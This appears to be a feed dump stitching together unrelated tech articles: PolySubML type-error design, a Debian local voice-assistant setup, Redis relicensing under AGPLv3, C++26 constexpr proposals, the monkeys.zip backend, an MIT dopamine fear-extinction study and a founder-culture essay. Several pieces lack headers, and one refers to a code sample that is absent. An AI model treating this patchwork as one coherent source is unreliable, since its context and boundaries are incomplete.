Assuming the user adds a correct type annotation, that narrows down the problem. For example, suppose you have something like int -> x -> y -> z -> float, where a value of type int flows to a use of type float, passing through points x, y, and z on the way.
Suppose we suggest that the user add a type annotation to y. Perhaps the user intended for it to be an int, in which case we get int -> x -> int -> z -> float and the conflict is narrowed down to the int -> z -> float part. Or perhaps they meant for it to be a float, in which case the conflict is narrowed down to int -> x -> float. Either way, the location of the user's mistake has been narrowed down.
Suggesting locations for type annotations like this is especially effective because that’s likely what the user would be doing anyway. Faced with a confusing type error that they can’t figure out, users will often start adding extra type annotations to their code to try to narrow down the problem.
However, if the user doesn't know where the problem is, they often also won't know where it would be useful to add type annotations either, and will waste a lot of effort without getting anywhere. With PolySubML, by contrast, the compiler explicitly highlights a location where adding a type annotation is guaranteed to help narrow down the cause of the mistake, leading to much faster and more effective debugging.
Aside: Why even have type inference?
Opponents of type inference will often ask what the point of even having type inference is if you have to add type annotations to track down errors. First, there's the obvious rebuttal that regardless of language, nobody ever annotates every single expression in the program, because that's just not feasible or useful; everyone supports type inference to some extent, and it's only a matter of degree.
But the other point is that having to annotate 5% of your code 5% of the time is much less work than being required to preemptively annotate 100% of your code 100% of the time. And especially with PolySubML, it will lead you directly to the problem, meaning few annotations are required to find it. And if you really want to, you can just remove the type annotations again afterwards (though you’ll often want to leave them around as documentation, etc.)
When type annotations aren’t enough
When a type conflict involves one or more inference variables, PolySubML will display the endpoints of the conflict and also suggest explicitly annotating one of those inference variables to help narrow down the cause of the conflict if it is not clear to the user.
That’s all well and good, you might wonder, but what happens in the case of a type conflict that doesn’t involve any inference variables? That’s a good question, and I unfortunately don’t have a good answer to it.
The good news is that such conflicts are inherently localized. For example, in the PolySubML typechecker, every function has a typed signature. If the user does not provide explicit types for the function, the compiler just implicitly inserts inference variables and uses those instead. This means that any type conflict which does not involve inference variables is also guaranteed to not cross any function boundaries.
Likewise, the compiler also inserts inference variables when there is no explicit type annotation for mutable record fields, nontrivial pattern matching, polymorphic instantiation, and most variable assignments, among other things. This means that the scope of a type conflict is inherently limited if it does not pass through any inference variables.
In the case of a conflict with no inference variables, PolySubML will display the endpoints of the conflict (like usual) and also display the expression where the conflict was detected during type checking. For example, in the following code:
let f = fun (x: int): int -> x + 1;
let a = 42.9;
let _ = f a;
PolySubML’s error message is as follows:
TypeError: Value is required to have type int here:
let f = fun (x: int): int -> x + 1;
^~~
let a = 42.9;
let _ = f a;
However, that value may have type float originating here:
let f = fun (x: int): int -> x + 1;
let a = 42.9;
^~~~
let _ = f a;
Note: Type mismatch was detected starting from this expression:
let f = fun (x: int): int -> x + 1;
let a = 42.9;
let _ = f a;
^
Hopefully, these three data points along with the constrained scope of the conflict will be enough for users to understand the issue in most cases. However, I’m concerned that in especially complex cases, that may not be enough.
The fact that there are no inference variables involved in a type conflict implies that the code effectively has two conflicting types right next to each other. However, if the types are especially big and complex, the user may not be able to determine the problematic parts, even with the conflicting types side by side.
I’m not sure what a good solution to that problem would be. Unlike with chains of data flow, where there is the widely accepted and understood solution of adding intermediate type annotations to narrow down the problem, there’s no way for the user to explicitly clarify intent within the middle of a complicated type signature itself. If anyone has a solution to this problem, please let me know. (Note that this is a problem any language will have, whether or not you’re doing type inference.)
Rule 4: Allow the user to write explicit type annotations
If you’re going to suggest that the user add explicit type annotations to help narrow down errors, you need to also make it possible for the user to add explicit type annotations.
For example, consider generic functions. A generic function is one that operates on placeholder types (aka type variables) which can be substituted for any type later, and in particular can be substituted for multiple different types at different points in the code.
In PolySubML, an example of a generic function is fun (type t) (x: t): t -> x. This is an identity function which can operate on any type. Instead of the type signature mentioning a specific type, it is defined with the type parameter t. Whenever the function is called, the type parameters are substituted with inference variables, with different inference variables at each callsite, a process called instantiation.
This leads to the question: is there syntax for explicit type instantiation? PolySubML was designed to follow Ocaml syntax as closely as possible, and in Ocaml, there is no syntax for explicitly providing types when instantiating a generic type. They presumably didn't see the need, since the instantiated types can always be inferred anyway.
However, just because the types can be inferred doesn't mean there is no need for explicit syntax. After all, the user might want to explicitly provide the types in order to narrow down type errors, document the types, or place additional constraints on the code.
Consider the following example:
let f = fun (type t) (x: t): t -> x;
let _: float = f 42;
In the f 42 code, f could be instantiated with t=int, in which case it will conflict with the expected return type of float. Alternatively, it could be instantiated with t=float, in which case the return type is correct but it conflicts with the argument type of int. This code has a conflict, but there's no way to know which half the user intended and which half is the mistake. If the user were able to provide an explicit type for t, they could indicate which one they meant and thus narrow down the error.
In PolySubML, type error messages will suggest adding an explicit type annotation to an inference variable if possible, which means that there needs to be a way for the user to supply explicit type annotations for any sort of inference variable, including those generated by generic function instantiation. And this means we need syntax for explicit instantiation.
Since Ocaml doesn't have any syntax for this, I had to make up my own for PolySubML. In PolySubML, you can explicitly instantiate polymorphic types by putting the types in square brackets after the expression, e.g. f[t=int], f[t=float], f[t=str -> bool], etc.
And thus, the above code results in the following error message:
TypeError: Value is required to have type float here:
let f = fun (type t) (x: t): t -> x;
let _: float = f 42;
^~~~~
However, that value may have type int originating here:
let f = fun (type t) (x: t): t -> x;
let _: float = f 42;
^~
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
let f = fun (type t) (x: t): t -> x;
let _: float = f[t=_] 42;
+++++
Rule 4b: Allow the user to write explicit type annotations
In the previous section, we saw that you have to be careful to ensure that your language syntax offers a place to add explicit type annotations where necessary. However, that’s not the only thing that can make it impossible for users to add type annotations.
A much more common problem is that many languages don't have syntax for writing the types themselves. For example, consider the following Rust code:
fn main() {
    let x = 42;
    let f: _ /* ??? */ = |y| x + y;
    f(23);
}
This code compiles and works just fine. However, there is no possible type annotation you could add to f (the part marked ???) and still have your code compile (at least not without using the Nightly compiler and opting into unstable features).
The problem is that Rust has types which exist in the type system but for which there is no syntax to actually write the type (here, the closure's anonymous, unnameable type). This means that your code works as long as the types are inferred. However, since there is no way to actually write the types you are using, you're completely stuck as soon as you need to add explicit type annotations.
Async streams are especially bad here because a) they tend to have complicated types, especially if you chain multiple stream operations and b) it is normally impossible to write any of the types involved. Debugging errors in Rust code using async streams is an exercise in frustration, which normally consists of staring at the code and making random adjustments until something compiles.
One time, I wasted considerable time attempting to add explicit type annotations to narrow down the cause of a type error in some stream code I was working on. I even tried breaking it up and adding Boxes so I could use dyn Trait, and I still wasn't able to get it working with explicit types, and still had no idea what the cause of the original compile error was. I ended up having to completely rewrite the code in question to stop using streams at all, since it was impossible to debug compile errors.
But enough ranting. The point here is that you shouldn't do this. Any type that can be inferred must also be possible to write explicitly.
It’s harder than you might think
Avoiding putting deliberately unwritable types into your language the way Rust did is a good first step. However, that's not enough by itself, because it is very easy to accidentally have unwritable types as well.
The requirement that every inferrable type also be expressible explicitly means that the typechecker can't have any special powers that let it do things which can't be done in the type syntax. There's a constant temptation to say "oh, let's just add this one extra analysis to the typechecker; that will solve a common pain point and allow more correct code to compile". But unless you also add corresponding explicit type syntax (which you usually won't, because that makes the language "more complicated"), you've just broken this rule.
An accidental violation
In fact, even if you’re deliberately trying to follow this rule, it is still very easy to break if you aren’t careful.
During the design of PolySubML, this rule was a major consideration, and I even went so far as to add an extra feature (type unions and intersections) to the type syntax just to make the necessary types expressible in one specific edge case. And even despite that, I still messed it up!
In the original release of PolySubML, the following code compiled:
This code doesn’t have any actual type conflicts, so what’s the problem? The problem is that it is inferring a type that can’t be written.

Specifically, there is no annotation that could be written for field v on the first line (where the ??? is). The inferred type for v is (`Some t), where t is the abstract type created by the pattern match on line 2. However, since t is only defined on line 2, there is no way for the user to explicitly write it in an annotation on line 1. The compiler is inferring a type that can’t be written, exactly what I tried so hard to avoid!
Therefore, I had to modify PolySubML so that it can only infer types that were in scope at the point of the inference variable being inferred, guaranteeing that the user could explicitly write that type at that point if they wanted to. Compiling the same code in PolySubML today instead results in a type error, thus satisfying rule 4.
Rule 5: Do not include static type inference in your runtime execution model
I won’t say much here because I already wrote an entire blog post on the topic, but I figured I should mention this for completeness, because it is another common design issue that causes type inference to behave in complex and surprising ways, and thus contributes to the bad reputation of type inference.
Conclusion
Type inference has a reputation for confusing and impossible-to-debug type errors. However, there is no reason why it has to be this way. If you design your language in the right way, you can still have high quality type errors even with powerful global type inference. This does mean avoiding certain features which are often convenient, but I think in the long run, having high quality error messages in your language is the superior tradeoff.
Jonathan McDowell: Local Voice Assistant Step 2: Speech to Text and back
PlanetDebian
www.earth.li
2025-05-01 19:05:51
Having setup an ATOM Echo Voice Satellite and hooked it up to Home Assistant we now need to actually do something with the captured audio. Home Assistant largely deals with voice assistants using the Wyoming Protocol, which describes itself as essentially JSONL + PCM audio. It works nicely in terms ...
Having set up an ATOM Echo Voice Satellite and hooked it up to Home Assistant, we now need to actually do something with the captured audio. Home Assistant largely deals with voice assistants using the Wyoming Protocol, which describes itself as essentially JSONL + PCM audio. It works nicely in that everything can exist as separate modules that just communicate over network sockets, and there are a whole bunch of Python implementations of the pieces necessary.
The first bit I looked at was speech to text: how do I get what I say to the voice satellite into something that Home Assistant can try and parse? There is a nice self-contained speech recognition tool called whisper.cpp, which is a low-dependency implementation of inference using OpenAI’s Whisper model. This is wrapped up for Wyoming as part of wyoming-whisper-cpp. Here we get into something that unfortunately seems common in this space: the repo contains a forked copy of whisper.cpp with enough differences that I couldn’t trivially make it work with regular whisper.cpp. That means missing out on new development and potential improvements (the fork appears to be at v1.5.4; upstream is up to v1.7.5 at the time of writing). However, it was possible to get up and running easily enough.
[I note there is a Wyoming Whisper API client that can use the whisper.cpp server, and that might be a cleaner way to go in the future, especially if whisper.cpp ends up in Debian.]
I stated previously I wanted all of this to be as clean an install on Debian stable as possible. Given most of this isn’t packaged, that’s meant I’ve packaged things up as I go. I’m not at the stage where anything is suitable for upload to Debian proper, but equally I’ve tried to make them a reasonable starting point. No pre-built binaries available, just Salsa git repos: https://salsa.debian.org/noodles/wyoming-whisper-cpp in this case. You need python3-wyoming from trixie if you’re building for bookworm, but it doesn’t need to be rebuilt.
You need a Whisper model that’s been converted to ggml format; they can be found on Hugging Face. I’ve ended up using the base.en model. In random testing I found small.en gave more accurate results but took a little longer; it doesn’t seem to make much of a difference for voice control rather than plain transcribing.
[One of the open questions about uploading this to Debian is around the use of a prebuilt AI model. I don’t know what the right answer is here, or whether the voice infrastructure could ever be part of Debian proper, but the current discussion on the interpretation of the DFSG on AI models is very relevant.]
I run this in the same container as my Home Assistant install, using a systemd unit file dropped in /etc/systemd/system/wyoming-whisper-cpp.service:
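A minimal sketch of such a unit (the ExecStart path, flags, and model location here are placeholders for wherever your build put things; port 10030 matches the Home Assistant configuration below):

[Unit]
Description=Wyoming whisper.cpp speech-to-text server
After=network.target

[Service]
# Placeholder invocation: adjust the script path, bind URI, and ggml model
# path to match your local wyoming-whisper-cpp install.
ExecStart=/usr/bin/wyoming-whisper-cpp --uri tcp://127.0.0.1:10030 --model /usr/share/whisper-cpp/ggml-base.en.bin
Restart=on-failure

[Install]
WantedBy=multi-user.target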
It needs the Wyoming Protocol integration enabled in Home Assistant; you can “Add Entry” and enter localhost + 10030 for host + port and it’ll get added. Then in the Voice Assistant configuration there’ll be a whisper.cpp option available.
Text to speech turns out to be weirdly harder. The right answer is something like Wyoming Piper, but that turns out to be hard on bookworm; I’ll come back to that in a future post. For now I took the easy option and used the built-in “Google Translate” option in Home Assistant. That needed an extra stanza in configuration.yaml that wasn’t entirely obvious:
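A minimal sketch of that stanza, assuming the stock google_translate TTS platform:

# configuration.yaml: enable the built-in Google Translate text-to-speech
tts:
  - platform: google_translate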
With this, and the ATOM voice satellite, I could now do basic voice control of my Home Assistant setup, with everything except the text-to-speech piece happening locally! Things such as “Hey Jarvis, turn on the study light” work out of the box. I haven’t yet got into defining my own phrases, partly because I know some of the things I want (“What time is it?”) are already added in later Home Assistant versions than the one I’m running.
Overall I found this initially complicated to setup given my self-imposed constraints about actually understanding the building blocks and compiling them myself, but I’ve been pretty impressed with the work that’s gone into it all. Next step, running a voice satellite on a Debian box.
Redis is now available under the AGPLv3 open source license (Redis blog)
Linux Weekly News
lwn.net
2025-05-01 18:47:25
After a somewhat tumultuous switch to the Server Side Public License (SSPL) in March 2024, Redis has backtracked and is now offering Redis under the Affero GPLv3 (AGPLv3) starting with Redis 8, CEO Rowan Trollope announced. The change back to an open-source license was led by Redis creator Sal...
I'll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. Writing open source software is too rooted in me: I rarely wrote anything else in my career. I'm too old to start now. This may be childish, but I wrote Vector Sets with a huge amount of enthusiasm exactly because I knew Redis (and my new work) was going to be open source again.
I understand that the core of our work is to improve Redis, to continue building a good system, useful, simple, able to change with the requirements of the software stack. Yet, returning back to an open source license is the basis for such efforts to be coherent with the Redis project, to be accepted by the user base, and to contribute to a human collective effort that is larger than any single company. So, honestly, while I can't take credit for the license switch, I hope I contributed a little bit to it, because today I'm happy. I'm happy that Redis is open source software again, under the terms of the AGPLv3 license.
Since last year's license switch, though, the Valkey project has sprung up as a fork under the original 3-clause BSD license.
Last week, we discussed language features that are becoming constexpr in C++26. Today, let’s turn our attention to the standard library features that will soon be usable at compile time. One topic is missing: exceptions. As they need both core language and library changes, I thought they deserved their own post.
This paper proposes making std::stable_sort, std::stable_partition, std::inplace_merge, and their ranges counterparts usable in constant expressions. While many algorithms have become constexpr over the years, this family related to stable sorting had remained exceptions — until now.
The recent introduction of constexpr containers gives extra motivation for this proposal. If you can construct a container at compile time, it’s only natural to want to sort it there, too. More importantly, a constexpr std::vector can now support efficient, stable sorting algorithms.
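A minimal sketch of the kind of code this enables (a hypothetical example of my own, not from the proposal; it assumes a C++26 compiler and library):

#include <algorithm>
#include <utility>
#include <vector>

// Stable-sort a constexpr std::vector at compile time by each pair's first
// element, then check that elements with equal keys kept their relative order.
constexpr bool sorted_stably() {
    std::vector<std::pair<int, int>> v{{2, 0}, {1, 0}, {2, 1}};
    std::ranges::stable_sort(v, {}, &std::pair<int, int>::first);
    return v[1] == std::pair{2, 0} && v[2] == std::pair{2, 1};
}
static_assert(sorted_stably());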
A key question is whether the algorithm can meet its computational complexity requirements under the constraints of constant evaluation. Fortunately, std::is_constant_evaluated() provides an escape hatch for implementations. For deeper details, check out the proposal itself.
P1383R2: More constexpr for <cmath> and <complex>
While P0533 made many <cmath> and <cstdlib> functions constexpr-friendly in C++23, it only addressed functions with trivial behavior — those no more complex than the basic arithmetic operators.
Floating-point computations can yield different results depending on compiler settings, optimization levels, and hardware platforms. For instance, calculating std::sin(1e100) may produce varying outcomes due to the intricacies of floating-point arithmetic at such scales. The paper discusses these challenges and suggests that some variability in results is acceptable, given the nature of floating-point computations.
The proposal accepts the need for a balance between strict determinism and practical flexibility. It suggests that while some functions should produce consistent results across platforms, others may inherently allow for some variability.
P3074R7: trivial unions (was std::uninitialized<T>)
To implement static, in-place, constexpr-friendly containers like non-allocating vectors, you often need uninitialized storage — typically via unions. However, the default behavior for special members of unions has been limiting: if not all alternatives are trivial, the special member is deleted. This presents a problem for constexpr code, where a no-op destructor isn’t quite the same as a trivial one.
The road to solving this wasn’t short: P3074R7 went through seven revisions and considered five possible solutions — including library-based approaches, new annotations, and even a new union type. Ultimately, the committee decided to just make it work with minimal changes to the user experience.
But how?
For unions, the default constructor - if there is no default member initializer - is always going to be trivial. If the first alternative is an implicit-lifetime type, it begins its lifetime and becomes the active member.
The defaulted destructor is deleted if either the union has a user-provided default constructor or there exists a variant alternative that has a default member initializer and that member’s destructor is either deleted or inaccessible. Otherwise, the destructor is trivial.
This excerpt from the proposal shows the changes well.
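To illustrate the rules above, here's a minimal sketch of my own (not from the proposal):

#include <string>

// A union whose first alternative is an implicit-lifetime type (int) and
// whose second alternative is non-trivial (std::string).
union U {
    int i;
    std::string s;
};

int main() {
    // Previously, U's defaulted constructor and destructor were deleted
    // because std::string's are non-trivial, so this line didn't compile.
    // Under P3074, U() is trivial and makes i the active member, and ~U()
    // is trivial too - destroying the active member is the programmer's job.
    U u;
    u.i = 42;
}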
Hana Dusíková authored a massive proposal that boils down to a simple goal: make (almost) all containers and adaptors constexpr.
Up until now, only a handful of them were constexpr-friendly (std::vector, std::span, std::mdspan, std::basic_string and std::basic_string_view). From now on, the situation will be flipped: almost everything will be constexpr-friendly. There is one exception and one constraint:
- std::hive is not included, because it doesn’t have stable wording yet
- if you want to use unordered containers at compile time, you must provide your own hashing facility, because std::hash cannot be made constexpr-friendly due to its requirements: its result is only guaranteed to be consistent within a single execution of the program
Happy days!
P3508R0: Wording for “constexpr for specialized memory algorithms”
Such a strange title, isn’t it? Wording for something…
As it turns out, there was already a paper accepted (P2283R2) making specialized memory algorithms constexpr-friendly: algorithms that are essential for implementing constexpr container support, yet were forgotten from C++20.
These algorithms are (both in the std and std::ranges namespaces):
uninitialized_value_construct
uninitialized_value_construct_n
uninitialized_copy
uninitialized_copy_result
uninitialized_copy_n
uninitialized_copy_n_result
uninitialized_move
uninitialized_move_result
uninitialized_move_n
uninitialized_move_n_result
uninitialized_fill
uninitialized_fill_n
When the paper was written, the necessary implementation change was to use std::construct_at instead of placement new, as std::construct_at was already constexpr. But in the meantime, P2747R2 was accepted and placement new in the core language also became constexpr. Therefore, the implementation of the above functions doesn’t have to be changed; only their signatures have to be updated to support constexpr. Hence, the wording change.
P3369R0: constexpr for uninitialized_default_construct
We saw that constexpr placement new affected P2283R2 and raised the need for the wording change performed in P3508R0. But that’s not the only side effect it had. From the algorithm families listed above, one is missing: uninitialized_default_construct. The reason is that uninitialized_default_construct cannot be implemented with std::construct_at: since std::construct_at always performs value initialization, default initialization was impossible.
But with constexpr placement new this is not an issue anymore, so uninitialized_default_construct can also be turned into constexpr.
Conclusion
C++26 marks a huge step forward for constexpr support in the standard library. From stable sorting algorithms to containers, from tricky union rules to specialised memory functions, compile-time programming is becoming more and more supported.
In the next article, we’ll cover compile-time exceptions!
It’s been one month since the launch of monkeys.zip. In that time, we’ve gathered over 11,000 monkeys, which have written over 6 billion words - completing well over 75% of the words in Shakespeare’s works. In fact, they’ve recently finished writing every four-letter word!
While the initial hype has died down to a small trickle, the monkeys are still typing just as hard as ever, and I figured it’d be a good time to talk about how I built the site. If this part doesn’t interest you, check out PART TWO where I talk all about the monkey names!
This is a relatively small list of technologies, as I tend to make as much as possible from scratch on my side projects, out of stubbornness. In this project, for example, I made a state management library called StateFarm. It’s awful; don’t use it.
The first important design decision comes with the concept of Ticks. The backend produces data in 15-second-long batches: the above pipeline runs every 15 seconds, producing 15 seconds’ worth of monkey-text. This interval length was chosen as a tradeoff between reducing the runtime of each step, making errors easier to retry and recover from, and spreading out DB load into smaller chunks, while reducing server <—> client bandwidth and requests.
Every 15 seconds, a cronjob calls a generateTick function, which has only one job: to put a new tick row in the ticks table.
Tick ID | Start Time | Seed          | Status
1234    | 04:13:25   | wn9837xw9873v | NEW
And that’s all it does! Keeping this step so simple and infallible is crucial to the reliability of later steps. If they fail, or there’s a huge data loss, everything can be rebuilt or retried as needed, as long as we have an entry in this table.
When a new tick is added to this table, the generateTickText function is called via a WebHook. This function has the job of generating the text for each monkey for that 15-second tick.
We use sfc32 to deterministically generate random numbers based on the seed, which is the tick seed merged with the monkey seed. This strategy allows a fully deterministic random monkey-text generator that can execute both server-side and client-side.
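For reference, here is the widely circulated JavaScript implementation of sfc32 (how the merged seed is hashed into the four 32-bit state words is glossed over here; the seed constants below are arbitrary placeholders):

// sfc32: a small, fast 32-bit PRNG. Given four 32-bit seed words,
// it returns a function producing deterministic floats in [0, 1).
function sfc32(a, b, c, d) {
  return function () {
    a >>>= 0; b >>>= 0; c >>>= 0; d >>>= 0;
    let t = (a + b) | 0;
    a = b ^ (b >>> 9);
    b = (c + (c << 3)) | 0;
    c = (c << 21) | (c >>> 11);
    d = (d + 1) | 0;
    t = (t + d) | 0;
    c = (c + t) | 0;
    return (t >>> 0) / 4294967296;
  };
}

// Same seed words in, same monkey text out - on the server or in the browser.
const rand = sfc32(0x9e3779b9, 0x243f6a88, 0xb7e15162, 0x1badf00d);
console.log(rand(), rand());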
Once the text is generated, we drop it into a Storage bucket. This isn’t strictly necessary, but I like the transparency. For debugging or investigation purposes, it’s nice to be able to browse all the text that monkeys have written, without having to regenerate it.
When the text is dropped into Storage, another WebHook is called, which combs through the text and searches for matches against a dictionary. It builds an immense batch update to a number of tables in our database:
monkey_words - Source of truth for every (valid) word every monkey has written
word_counts_cache - Faster lookups for a given word (e.g. "monkey" has appeared 100 times)
monkey_items - Any items a monkey earns are granted via this table
A more recent addition has been a separate cleanup script which runs on a cron job, the purpose of which is to archive old, short words from the monkey_words table and place them into a monkey_words_archived table. This drastically speeds up reads on monkey_words (which started slowing down at several billion rows).
The grid of monkeys is divided into chunks of 64x64, which hold almost no value except for creating a minimum query size for monkeys while scrolling through the app, and allowing me to cache these chunks in Redis. During normal traffic, it’s actually slower (by over 100 ms) to fetch the cached result from Redis than to just query the DB for it, but in the early days when the application was being battered by reddit, it was a lifesaver to be able to render the monkeys without the database needing to be responsive.
There’s still a fair amount of optimization that remains to be done. Now that we’re getting into the ‘diminishing returns’ portion of this project, I’d love to speed the monkey typing up, so that we can start carving through the 6 and 7 letter words, but that will require some further architectural changes. I’m largely considering getting a custom VPS with just a big bucket of RAM, and doing this all in-memory, for speed.
Dangers come but dangers also go and when they do, the brain has an “all-clear” signal that teaches it to extinguish its fear. A new study in mice by MIT neuroscientists shows that the signal is the release of dopamine along a specific interregional brain circuit. The research therefore pinpoints a potentially critical mechanism of mental health, restoring calm when it works, but prolonging anxiety or even post-traumatic stress disorder when it doesn’t.
“Dopamine is essential to initiate fear extinction,” said Michele Pignatelli di Spinazzola, co-author of the new study from the lab of senior author Susumu Tonegawa, Picower Professor of biology and neuroscience at the RIKEN-MIT Laboratory for Neural Circuit Genetics in The Picower Institute for Learning and Memory and an HHMI Investigator.
In 2020, Tonegawa’s lab showed that learning to be afraid, and then learning when that’s no longer necessary, result from a competition between populations of cells in the brain’s amygdala region. When a mouse learns that a place is “dangerous” (because it gets a little foot shock there), the fear memory is encoded by neurons in the anterior of the basolateral amygdala (aBLA) that express the gene Rspo2. When the mouse then learns that a place is no longer associated with danger (because they wait there and the zap doesn’t recur), neurons in the posterior basolateral amygdala (pBLA) that express the gene Ppp1r1b encode a new fear extinction memory that overcomes the original dread. Notably, those same neurons encode feelings of reward, helping to explain why it feels so good when we realize that an expected danger has dwindled.
In the new study, the lab, led by former members Xiangyu Zhang and Katelyn Flick, sought to determine what prompts these amygdala neurons to encode these memories. The rigorous set of experiments the team reports in the Proceedings of the National Academy of Sciences shows that it’s dopamine, sent to the different amygdala populations from distinct groups of neurons in the ventral tegmental area (VTA).
“Our study uncovers a precise mechanism by which dopamine helps the brain unlearn fear,” said Zhang, who also led the 2020 study and is now Senior Associate at Orbimed, a healthcare investment firm. “We found that dopamine activates specific amygdala neurons tied to reward, which in turn drive fear extinction. We now see that unlearning fear isn’t just about suppressing it—it’s a positive learning process powered by the brain’s reward machinery. This opens up new avenues for understanding and potentially treating fear-related disorders like PTSD.”
Forgetting fear
The VTA was the lab’s prime suspect to be the source of the signal because the region is well known for encoding surprising experiences and instructing the brain, with dopamine, to learn from them. The first set of experiments in the paper used multiple methods for tracing neural circuits to see whether and how cells in the VTA and the amygdala connect. They found a clear pattern: Rspo2 neurons were targeted by dopaminergic neurons in the anterior and left and right sides of the VTA. Ppp1r1b neurons received dopaminergic input from neurons in the center and posterior sections of the VTA. The density of connections was greater on the Ppp1r1b neurons than for the Rspo2 ones.
An edited version of a figure from the research shows the ventral tegmental area, highlighting dopamine-associated neurons in green and one that connects to the posterior amygdala (magnified in inset) in red.
The circuit tracing showed that dopamine is available to amygdala neurons that encode fear and its extinction, but do those neurons care about dopamine? The team showed that indeed they express “D1” receptors for the neuromodulator. Commensurate with the degree of dopamine connectivity, Ppp1r1b cells had more receptors than Rspo2 neurons.
Dopamine does a lot of things, so the next question was whether its activity in the amygdala actually correlated with fear encoding and extinction. Using a method to track and visualize it in the brain, the team watched dopamine in the amygdala as mice underwent a three-day experiment. On day one they went to an enclosure where they experienced three little zaps on the feet. On day two they went back to the enclosure for 45 minutes where they didn’t experience any new shocks; at first the mice froze in fear but then relaxed after about 15 minutes. On day three they returned again to test whether they had indeed extinguished the fear they showed at the beginning of day two.
The dopamine activity tracking revealed that during the shocks on day 1, Rspo2 neurons had the larger response to dopamine, but in the early moments of day 2 when the anticipated shocks didn’t come and the mice eased up on freezing in fear, the Ppp1r1b neurons showed the stronger dopamine activity. More strikingly, the mice that learned to extinguish their fear most strongly also showed the greatest dopamine signal at those neurons.
Causal connections
The final sets of experiments sought to show that dopamine is not just available and associated with fear encoding and extinction, but also actually causes them. In one set, they turned to optogenetics, a technology that enables scientists to activate or quiet neurons with different colors of light. Sure enough, when they quieted VTA dopaminergic inputs in the pBLA, doing so impaired fear extinction. When they activated those inputs, it accelerated fear extinction. The researchers were surprised that when they activated VTA dopaminergic inputs into the aBLA they could reinstate fear even without any new foot shocks, impairing fear extinction.
The other way they confirmed a causal role for dopamine in fear encoding and extinction was to manipulate the amygdala neurons’ dopamine receptors. In Ppp1r1b neurons, overexpressing dopamine receptors impaired fear recall and promoted extinction, whereas knocking the receptors down impaired fear extinction. Meanwhile in the Rspo2 cells, knocking down receptors reduced the freezing behavior.
“We showed that fear extinction requires VTA dopaminergic activity in the pBLA Ppp1r1b neurons by using optogenetic inhibition of VTA terminals and cell-type-specific knockdown of D1 receptors in these neurons,” the authors wrote.
The scientists are careful in the study to note that while they’ve identified the “teaching signal” for fear extinction learning, the broader phenomenon of fear extinction occurs brainwide, rather than in just this single circuit.
But the circuit seems to be a key node to consider as drug developers and psychiatrists work to combat anxiety and PTSD, Pignatelli di Spinazzola said.
“Fear learning and fear extinction provide a strong framework to study generalized anxiety and PTSD,” he said. “Our study investigates the underlying mechanisms suggesting multiple targets for a translational approach such as pBLA and use of dopaminergic modulation.”
Marianna Rizzo is also a co-author of the study. Support for the research came from the RIKEN Center for Brain Science, the Howard Hughes Medical Institute, the Freedom Together Foundation and The Picower Institute for Learning and Memory.
It's understandable why the guys who had big tech startup successes in the 90s and early aughts think that "DEI" is the cause of all their problems. Not understandable in the "gotta hand it to em" sense, but in the sense that it's not hard to follow the stupid mistake they all make.
I didn't see any of this unfold, but I think I've pretty much seen it. 2005, old dorm room with mold on the walls, the birds start to chirp their alarm to the fact that you're up way too late. I can't argue with anyone who wants to say the place exudes "a masculine energy," or at least a masculine smell. I'm here because programming was the only career path for which, in the limited vision of my youth, I could already see and understand exactly what I'd be doing, and that there was very little I would need from anyone else to get there. I'd be very surprised if Marc Andreessen, Mark Zuckerberg, and James Damore don't know, and to this day yearn to recreate, the sensations I'm describing. They never find it again, because:
These men are no longer young. I'm not either. I still have Ideas, and I still think about what it would be like to crush it for a few weeks straight, alternating between coffee and beer, manifesting a vision. But... well, if you're still young, you'll find out soon enough, and otherwise, you know already that there are too many other things that need doing, because responsible people have responsibilities.
The Internet is no longer the world's great frontier, and the pool of unsatisfied wants that suddenly welled up as the world first came online is not what it once was. There once was no graphical operating system, no decent web browser, no search engine that could find what you were looking for. The basic amenities are now there. Of course there is still much room for innovation, but merely being able to write a computer program and understand what computer networks are good for is no longer the superpower it once was. If you're young enough to pound Red Bulls all night, you're probably not old enough to have the breadth of knowledge required to launch a great software product.
For those who happened upon great success, chance was a significant factor. First, just being born into a little seed cash and enough comfort to go a while without working a straight job. As Julie says when someone repeats that Amazon was started in a garage: Ain't no garages in the trailer park. And as many said in the startup incubator we lovingly called the Bitcoin Basement, it takes a dozen miracles to launch a business successfully.
That you got lucky at a singular moment in history and now you're an old man is not an easy set of facts to accept. So I understand — that is, I see how — one can end up associating one's best years with superficial aspects of their circumstance. You had no responsibilities, no serious consequences for failure, and the freedom to be reckless and inconsiderate. You launched small new products that didn't require building a team. If you attended school, the vast majority of your fellow students were men, and they were more or less all the same person as you.
If these are the conditions under which passionate creative problem solving thrives, then of course we must recover them to make software great again. But they are not. We need look no further than the "hackathon," that sad facsimile of the days when we were all learning the basics so fast that the world could be ours with just a day or two of focused effort. Hype up an exciting atmosphere, assemble some folks with so few attachments in life that they have time to spend all weekend at a hackathon, and this ritual will summon up the old gods. The hackathon is the proof that people believe this can work, and it is the proof that it doesn't.
Maybe most of the critical things that can be created by one guy typing furiously are gone, and the opportunities that remain require expertise and wisdom from a bunch of different people. This is harder than spending all day every day doing your favorite thing and insisting that everyone else leave you alone. Often it's boring. Sometimes there's paperwork. You will have to have conversations with people you don't always understand right away. Your job evolves, and it turns out not to be exactly what you thought it would be like when you were a teenager.
Maybe, like Dennis Hopper's character in Hoosiers, you need to give up on trying to relive the glory days of being the high school basketball star, and start to accept and settle into your new responsibilities as a coach and a respectable father, and stop being the town drunk.
Redis is open source again
Simon Willison
simonwillison.net
2025-05-01 18:19:36
Redis is open source again
Salvatore Sanfilippo:
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. [...]
I’ll be honest: I truly wanted the...
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. [...]
I’ll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. [...]
So, honestly, while I can’t take credit for the license switch, I hope I contributed a little bit to it, because today I’m happy. I’m happy that Redis is open source software again, under the terms of the AGPLv3 license.
I'm absolutely thrilled to hear this. Redis 8.0 is out today under the new license, including a beta release of Vector Sets. I've been watching Salvatore's work on those with fascination, while sad that I probably wouldn't use it often due to the janky license. That concern is now gone. I'm looking forward to putting them through their paces!
A tool to manage versioning and changelogs
with a focus on multi-package repositories
The changesets workflow is designed to help when people are making changes, all the way through to publishing. It lets contributors declare how their changes should be released, then we automate updating package versions, and changelogs, and publishing new versions of packages based on the provided information.
